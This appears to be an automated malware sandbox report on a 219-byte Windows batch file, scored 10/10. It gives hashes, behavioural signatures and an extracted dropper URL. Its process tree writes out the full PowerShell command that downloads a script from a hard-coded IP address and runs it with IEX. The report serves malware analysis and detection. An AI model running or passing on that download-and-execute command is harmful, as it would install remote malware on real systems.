Analysis
-
max time kernel
127s -
max time network
149s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
05-06-2020 10:10
Static task
static1
Behavioral task
behavioral1
Sample
08d62202634f8b1ef5c5b10ef8db5891.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
08d62202634f8b1ef5c5b10ef8db5891.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
08d62202634f8b1ef5c5b10ef8db5891.bat
-
Size
219B
-
MD5
616c257a819adb60eed0688846b302cd
-
SHA1
bb40b235e005c837e96ba5ea9ceb2748952808ed
-
SHA256
78996c71b494d4588386237c37101c663c8420c13e7615a1955195ef483a0e05
-
SHA512
bb70e6beb231053af8ebd208547aeac3efea4570339377530dd88d9dfae488c85adf06d515e90d2d99d76f16f8a5daac52992ebabcd08e1523d7569d224755d3
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/08d62202634f8b1ef5c5b10ef8db5891
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2160 1880 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 2160 WerFault.exe Token: SeBackupPrivilege 2160 WerFault.exe Token: SeDebugPrivilege 2160 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\08d62202634f8b1ef5c5b10ef8db5891.bat"1⤵PID:1628
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/08d62202634f8b1ef5c5b10ef8db5891');Invoke-FGMKPKSTXRLT;Start-Sleep -s 10000"2⤵PID:1880
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1880 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2160